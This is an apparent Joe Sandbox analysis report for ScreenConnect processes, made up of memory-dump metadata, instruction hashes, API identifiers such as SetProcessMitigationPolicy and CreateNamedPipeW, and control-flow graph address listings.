                                                                • Instruction ID: 6f63e9520880b50afbd4f3fce0775834568021dc976ba160ecc3ce0285e74682
                                                                • Opcode Fuzzy Hash: 5abb42da74fcf284e0dc63408b9a8c32d0e8f3d9c94726214b9f581c00f43246
                                                                • Instruction Fuzzy Hash: F9D01730A1021DEBDB44DFA8F90069DB7F9EB45304B1049A8D808E7210EA31AE059B90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 49f320fbb7ffbdf17eaf9c6236d13dac693e2aefa917858c3a3cfde032949bf0
                                                                • Instruction ID: 8c1185a0640e5a3bf674617cffb9844c9be571924e33d25356a53fd0f817c44b
                                                                • Opcode Fuzzy Hash: 49f320fbb7ffbdf17eaf9c6236d13dac693e2aefa917858c3a3cfde032949bf0
                                                                • Instruction Fuzzy Hash: 94D01730A11219EBDB44DFA8F94069DBBB5EB45304B1049A8D808E7210EA31AF069B80
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 81646de086942b5cae10e57538a01e6a3d6ff7d4792d38a11d079fe65a790058
                                                                • Instruction ID: 730d71f6cfd693768628316718dfb229ed524a360a8a2155347c77650df5a0f4
                                                                • Opcode Fuzzy Hash: 81646de086942b5cae10e57538a01e6a3d6ff7d4792d38a11d079fe65a790058
                                                                • Instruction Fuzzy Hash: 9DD05E7A1492848FC7028B64E954CA03FF4AF5A60432A84C2E148CB273D621EC06CFA1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7f07d386c04c6a2feffa0c50a1109cdec5538d9b109130c7fe4f2e4fc10fc497
                                                                • Instruction ID: da695240a23256fbe3f8c6bcf750961a8df59f15cd6f3cc741834567a2b0b1c0
                                                                • Opcode Fuzzy Hash: 7f07d386c04c6a2feffa0c50a1109cdec5538d9b109130c7fe4f2e4fc10fc497
                                                                • Instruction Fuzzy Hash: 3FD0C932814B0D8AC700BBB8E4584A9B7B8EED5200F00DA5BE88A67121FF70E6D0D691
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dac84bd2391221677ad788e911c7235f27280dfbcb5f71545669e7d5b9c8bce9
                                                                • Instruction ID: cf22bf4274c2144a73b80f18399be93bd1b889ec3d86ad461d97e4917d2c0027
                                                                • Opcode Fuzzy Hash: dac84bd2391221677ad788e911c7235f27280dfbcb5f71545669e7d5b9c8bce9
                                                                • Instruction Fuzzy Hash: B9D0C9342080408FC304CB64C991A10BFB1EB8A204B18C0C994898B363C626DD43C744
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                APIs
                                                                • RtlGetVersion.NTDLL(0000009C), ref: 013B4DBE
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3392893400.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_13b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: Version
                                                                • String ID:
                                                                • API String ID: 1889659487-0

                                                                Execution Graph

                                                                Execution Coverage:12.8%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:5
                                                                Total number of Limit Nodes:1
                                                                execution_graph 12596 7ffd33e28014 12598 7ffd33e2801d 12596->12598 12597 7ffd33e28082 12598->12597 12599 7ffd33e280f6 SetProcessMitigationPolicy 12598->12599 12600 7ffd33e28152 12599->12600

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: H$X]3$]3
                                                                • API String ID: 0-1673269330

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PM3$XM3
                                                                • API String ID: 0-75653409

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PM3$XM3
                                                                • API String ID: 0-75653409

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PM3$XM3
                                                                • API String ID: 0-75653409

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: \3
                                                                • API String ID: 0-486386732

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3412723842.00007FFD33E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd33e20000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: MitigationPolicyProcess
                                                                • String ID:
                                                                • API String ID: 1088084561-0

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1006 7ffd33e23aa2-7ffd33e280ef 1008 7ffd33e280f6-7ffd33e28150 SetProcessMitigationPolicy 1006->1008 1009 7ffd33e28152 1008->1009 1010 7ffd33e28158-7ffd33e28187 1008->1010 1009->1010
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3412723842.00007FFD33E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33E20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd33e20000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: MitigationPolicyProcess
                                                                • String ID:
                                                                • API String ID: 1088084561-0

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: P'3
                                                                • API String ID: 0-1611138016

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: H
                                                                • API String ID: 0-2852464175
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: M3
                                                                • API String ID: 0-3098042829
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: `j3
                                                                • API String ID: 0-3289487541
                                                                • Instruction ID: 818a3734265e1d6fb4877d2637276e66da0669afcd54eb6cc6f29cb060b63b74
                                                                • Opcode Fuzzy Hash: ce7304c3198d2633a671a365774ac6a33d3233c8bddbbe6a5d348044b4ab2b4a
                                                                • Instruction Fuzzy Hash: 8F113D62B18D494FDB99EF18C4A1B65B7E1FF59304B1441A9C54DDB286CE29F805CB40
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a4c79ec6da5ed7507997e39457721f415ea1ed5ca9c3cea9cb32a468475c3afc
                                                                • Instruction ID: e613dde48272bcec2c7a329c1f62bd65bcde7b985c057b426ea95fc6500f4d99
                                                                • Opcode Fuzzy Hash: a4c79ec6da5ed7507997e39457721f415ea1ed5ca9c3cea9cb32a468475c3afc
                                                                • Instruction Fuzzy Hash: 4D01F962B28D4A0FEF98FB7D44A45B667D1FFA8324710427AE41DD32DADD28E8428344
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6f73897e9b5580f402e84bd5cdd562a43e6cbd13c567121162d78689a2814ed2
                                                                • Instruction ID: d8c751c99eeb8c18d8e4c28f3ce67fa5449a05483f535d15578f2b06ba4e87ea
                                                                • Opcode Fuzzy Hash: 6f73897e9b5580f402e84bd5cdd562a43e6cbd13c567121162d78689a2814ed2
                                                                • Instruction Fuzzy Hash: 15F0622144E6D21FD3469BB0C8656E47FF1AF47120B0E82FAD4C8CB4A3D50C5C8AC3A1
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2faf06c428656c83086a0c1435a453bfee2a831f9f885c595a5250c4dd8fffcb
                                                                • Instruction ID: 2299d6074bd062bbc799e45d2497bcb6ce34a33b3c6c748b3562fe6395a669a3
                                                                • Opcode Fuzzy Hash: 2faf06c428656c83086a0c1435a453bfee2a831f9f885c595a5250c4dd8fffcb
                                                                • Instruction Fuzzy Hash: E9E0922490DA861FD74AAB3488A94F13FB0AE5721178901DAD888CA067F91C89C5C392
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fc6a592c7bb4a108f11160e9febe21a37ee38557ee418de0678e352faf1af6f2
                                                                • Instruction ID: b8a2751b2d85595270f6ecfc94815c6c74619282d6bc6f78c8216897ab8d05f0
                                                                • Opcode Fuzzy Hash: fc6a592c7bb4a108f11160e9febe21a37ee38557ee418de0678e352faf1af6f2
                                                                • Instruction Fuzzy Hash: 54F0923541969D9FCB42EB34E4558E67F70EF17314B0501CBE089CB023EB219A56CBC2
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9f5cd098a4ccab4ffbe74bca27f7419ddb994312461a42b3d292f4430c939015
                                                                • Instruction ID: 00b702488bdd05b4effe06711703daef75fa523d39aabc159a0fc297b0e3d0a2
                                                                • Opcode Fuzzy Hash: 9f5cd098a4ccab4ffbe74bca27f7419ddb994312461a42b3d292f4430c939015
                                                                • Instruction Fuzzy Hash: A8E08C16B4DE6702FB6C226678B53B560809F06351F0981BA950EC10C5DC5CDC81A151
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 43c29b485d44917ae7501498eb3c11dfd5b4fba01ae5af9432449e6e1904135a
                                                                • Instruction ID: 66074707da253e2deb5a426347de5f4d8165ad1cc5d8a69bc381634f16ba9d16
                                                                • Opcode Fuzzy Hash: 43c29b485d44917ae7501498eb3c11dfd5b4fba01ae5af9432449e6e1904135a
                                                                • Instruction Fuzzy Hash: FFC04C01B5892D0AA4E4B19D34653FD91C6D788661B8411F6E90CE228ADC095CC213C5
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fb101c9fd3868cae566ed89a81dace46fa499b41e0f96041f46b42c254d42f27
                                                                • Instruction ID: f2feb572683f4887e3f72c3ab5644ce3a9ed01a462e301dca3bfbf9a05b727b1
                                                                • Opcode Fuzzy Hash: fb101c9fd3868cae566ed89a81dace46fa499b41e0f96041f46b42c254d42f27
                                                                • Instruction Fuzzy Hash: 82C09B14F58D4A46F144FB24857117D51926F88240F544675D21DE11C6CE3D65017545
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.3421579134.00007FFD34130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34130000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_7ffd34130000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 349938658ae71ee1100d9b186e105d477bd60a94e3429c739a1d4343092d63c5
                                                                • Instruction ID: d5dd1e4cd608e7f3d4d5a9a96ba1280304b05e2d6471b8a6beb9964c77e452f6
                                                                • Opcode Fuzzy Hash: 349938658ae71ee1100d9b186e105d477bd60a94e3429c739a1d4343092d63c5
                                                                • Instruction Fuzzy Hash: 07A00205F8DD1A45A0617614417117D40910F55640E2443B5D30DE129ACE5D6D427196

                                                                Execution Graph

                                                                Execution Coverage:13.8%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:16
                                                                Total number of Limit Nodes:1
                                                                execution_graph 15073 7ffd33e13642 15074 7ffd33e35880 CreateNamedPipeW 15073->15074 15076 7ffd33e359b3 15074->15076 15087 7ffd33e13662 15088 7ffd33e35df0 ConnectNamedPipe 15087->15088 15090 7ffd33e35ea2 15088->15090 15077 7ffd33e18014 15079 7ffd33e1801d 15077->15079 15078 7ffd33e18082 15079->15078 15080 7ffd33e180f6 SetProcessMitigationPolicy 15079->15080 15081 7ffd33e18152 15080->15081 15082 7ffd34128edc 15086 7ffd34128eeb 15082->15086 15083 7ffd34129029 GlobalMemoryStatusEx 15084 7ffd34129055 15083->15084 15085 7ffd34128f88 15086->15083 15086->15085

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 789 7ffd34128edc-7ffd34128ee9 790 7ffd34128f05-7ffd34128f25 789->790 791 7ffd34128eeb-7ffd34128efa 789->791 793 7ffd34128f7e 790->793 794 7ffd34128f27-7ffd34128f2a 790->794 796 7ffd34128f44-7ffd34128f57 791->796 797 7ffd34128efc-7ffd34128f04 791->797 795 7ffd34128f7f 793->795 798 7ffd34128fab-7ffd34128faf 794->798 799 7ffd34128f2c-7ffd34128f2e 794->799 801 7ffd34128f80 795->801 802 7ffd34128ffb 795->802 815 7ffd34128fc8-7ffd34128fc9 796->815 816 7ffd34128f59-7ffd34128f5d 796->816 797->790 811 7ffd34128fb0 798->811 803 7ffd34128f30 799->803 804 7ffd34128faa 799->804 807 7ffd34129001-7ffd34129027 801->807 808 7ffd34128f81 801->808 802->807 809 7ffd34128f73 803->809 810 7ffd34128f32-7ffd34128f34 803->810 804->798 817 7ffd34129029-7ffd34129053 GlobalMemoryStatusEx 807->817 818 7ffd34128fc3-7ffd34128fc7 808->818 819 7ffd34128f82-7ffd34128f86 808->819 813 7ffd34128fef-7ffd34128ff3 809->813 814 7ffd34128f75 809->814 810->811 812 7ffd34128f36 810->812 820 7ffd34128f38-7ffd34128f3a 812->820 821 7ffd34128f79 812->821 824 7ffd34128ff5-7ffd34128ffa 813->824 822 7ffd34128fb7-7ffd34128fb9 814->822 823 7ffd34128f76-7ffd34128f77 814->823 831 7ffd34128fe5-7ffd34128fe8 815->831 832 7ffd34128fcb-7ffd34128fdc 815->832 825 7ffd34128f5f-7ffd34128f61 816->825 826 7ffd34128fde 816->826 827 7ffd34129055 817->827 828 7ffd3412905b-7ffd34129082 817->828 818->815 829 7ffd34128f88-7ffd34128f8d 819->829 830 7ffd34128f6c-7ffd34128f6d 819->830 833 7ffd34128fb6 820->833 834 7ffd34128f3c 820->834 821->824 843 7ffd34128f7b-7ffd34128f7d 821->843 835 7ffd34128fbf 822->835 836 7ffd34128fbb-7ffd34128fbe 822->836 823->821 824->802 837 7ffd34128fdd 825->837 838 7ffd34128f63-7ffd34128f67 825->838 842 7ffd34128fdf 826->842 827->828 851 7ffd34128f95-7ffd34128fa9 829->851 840 7ffd34128f6e 830->840 841 7ffd34128fe9-7ffd34128fee 830->841 831->841 832->837 833->822 834->795 844 7ffd34128f3e-7ffd34128f41 834->844 845 
7ffd34128fc0-7ffd34128fc1 835->845 846 7ffd34128fc2 835->846 836->835 837->826 847 7ffd34128fe3 838->847 848 7ffd34128f69 838->848 840->842 849 7ffd34128f6f-7ffd34128f71 840->849 841->813 842->817 850 7ffd34128fe0-7ffd34128fe1 842->850 843->793 844->845 852 7ffd34128f43 844->852 845->846 846->818 847->831 848->798 853 7ffd34128f6b 848->853 849->809 850->847 851->804 852->796 853->830
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2262320168.00007FFD34120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34120000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ffd34120000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bb59ab92eda26dd2113ce050333c22da5c02f74385f3b9a11aca2428e15a3623
                                                                • Instruction ID: 50f0b16e25c1f9d8694980eaedb33c43e3cca70f5759007c1c7530b08d8750ad
                                                                • Opcode Fuzzy Hash: bb59ab92eda26dd2113ce050333c22da5c02f74385f3b9a11aca2428e15a3623
                                                                • Instruction Fuzzy Hash: B0712932E0CA4E4FE764DB5888656F97BE1FF57360F04027AD14DC7592DEAC680A8781

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2256344883.00007FFD33E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ffd33e10000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: MitigationPolicyProcess
                                                                • String ID:
                                                                • API String ID: 1088084561-0
                                                                • Opcode ID: 681651c723ae9bce24e9a1379e14f5a547ea409b59a0c94a69930feabe98b78d
                                                                • Instruction ID: e8c0eeb60d23deec4803567014316a231412dcd47376fb592b96d53167d25e24
                                                                • Opcode Fuzzy Hash: 681651c723ae9bce24e9a1379e14f5a547ea409b59a0c94a69930feabe98b78d
                                                                • Instruction Fuzzy Hash: E0514831D0CB494FEB24AFA8984A5E97BE0EF55311F04027FE089D3192DE68A846C791

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1368 7ffd33e13642-7ffd33e358ea 1371 7ffd33e358f4-7ffd33e359b1 CreateNamedPipeW 1368->1371 1372 7ffd33e358ec-7ffd33e358f1 1368->1372 1374 7ffd33e359b3 1371->1374 1375 7ffd33e359b9-7ffd33e359ec 1371->1375 1372->1371 1374->1375
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2256344883.00007FFD33E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ffd33e10000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CreateNamedPipe
                                                                • String ID:
                                                                • API String ID: 2489174969-0
                                                                • Opcode ID: 7c0fb6973b0c140e9852de0fc9fd0fdab436637816383b3e67a9a62694e5f79a
                                                                • Instruction ID: dd25f5ba2ae9d7fe188d063e271f319d99d3ceb077feae46caa28d2683478ef3
                                                                • Opcode Fuzzy Hash: 7c0fb6973b0c140e9852de0fc9fd0fdab436637816383b3e67a9a62694e5f79a
                                                                • Instruction Fuzzy Hash: 5C51807191CA1C8FDB68EF5C9845BE9B7E0FB59720F0442AEE04EE3251CB31A8418BC1

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1457 7ffd33e13662-7ffd33e35ea0 ConnectNamedPipe 1461 7ffd33e35ea2 1457->1461 1462 7ffd33e35ea8-7ffd33e35ef0 call 7ffd33e35ef1 1457->1462 1461->1462
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2256344883.00007FFD33E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ffd33e10000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: ConnectNamedPipe
                                                                • String ID:
                                                                • API String ID: 2191148154-0
                                                                • Opcode ID: d7af5024e9ef63f8ddfd752f52b1896d6f6eb41c358e658802eb356f3e678682
                                                                • Instruction ID: 4d3300c596b271e1b2e91f6dd62377b7c9dc4d81a46b27548c80487099a270c4
                                                                • Opcode Fuzzy Hash: d7af5024e9ef63f8ddfd752f52b1896d6f6eb41c358e658802eb356f3e678682
                                                                • Instruction Fuzzy Hash: 6F314170A08A1C8FDB58EF98D849BEDB7F1FB54311F00826AD04DE7255DB70A945CB81

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1466 7ffd33e13aa2-7ffd33e180ef 1468 7ffd33e180f6-7ffd33e18150 SetProcessMitigationPolicy 1466->1468 1469 7ffd33e18152 1468->1469 1470 7ffd33e18158-7ffd33e18187 1468->1470 1469->1470
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2256344883.00007FFD33E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33E10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ffd33e10000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: MitigationPolicyProcess
                                                                • String ID:
                                                                • API String ID: 1088084561-0
                                                                • Opcode ID: 6ece3c238fd99ddf7c5322ead5f07fbd8ba3eb518c1229b875e041b66cde67e8
                                                                • Instruction ID: a1d502ea73e22c062cb84ccc15032b6abfd5480b783aba02f77d27a51f370446
                                                                • Opcode Fuzzy Hash: 6ece3c238fd99ddf7c5322ead5f07fbd8ba3eb518c1229b875e041b66cde67e8
                                                                • Instruction Fuzzy Hash: E321D731918B188FDB28AF9CD84A6F9B7E0EB55711F00422EE049D3251DB74B845CB91